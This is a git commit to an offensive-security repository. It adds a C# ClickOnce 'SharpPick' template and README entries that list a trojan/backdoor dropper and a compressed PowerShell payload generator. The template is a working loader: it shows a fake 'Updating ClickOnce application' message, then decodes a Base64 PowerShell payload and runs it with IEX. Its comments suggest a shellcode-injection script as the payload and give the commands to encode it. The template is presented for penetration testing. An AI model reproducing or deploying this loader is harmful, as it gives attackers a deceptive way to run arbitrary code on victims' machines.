Added ClickOnce SharpPick template.

This commit is contained in:
Mariusz B 2018-02-10 16:45:32 +01:00
parent cc5ba84532
commit c52a66f3c9
2 changed files with 71 additions and 0 deletions

View File

@ -4,6 +4,8 @@
- **`backdoor-drop.js`** - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. ([gist](https://gist.github.com/mgeeky/b0aed7c1e510560db50f96604b150dac))
- **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015))
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))

View File

@ -0,0 +1,69 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Resources;
using System.Net;
using System.Collections.ObjectModel;
//
// Use NuGet to install System.Management.Automation reference.
//
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace ConsoleApplication2
{
class Program
{
//
// This function and concept comes from PowerPick / SharpPick project by Sixdub:
// https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
//
static string RunPS(string cmd)
{
// Init stuff
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
// Add commands
pipeline.Commands.AddScript(cmd);
// Prep PS for string output and invoke
pipeline.Commands.Add("Out-String");
Collection<PSObject> results = pipeline.Invoke();
runspace.Close();
// Convert records to strings
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
static void Main()
{
Console.WriteLine("Updating ClickOnce application. Please wait...");
//
// Here comes your Base64 encoded Powershell payload.
// A good example of what to stick in here is a modified Invoke-Shellcode.ps1
// that will spawn a process and insert there some shellcode.
// You can prepare Base64 UTF8 shellcode via:
// PS> $text = Get-Content yourShellcode.ps1
// PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text);
// PS> $encoded = [Convert]::ToBase64String($bytes);
// PS> $encoded | Out-File "myEncodedShellcode.ps1"
//
String base64encodedPayload = "<INSERT HERE YOUR BASE64 ENCODED POWERSHELL PAYLOAD>";
RunPS("IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"" + base64encodedPayload + "\")))");
}
}
}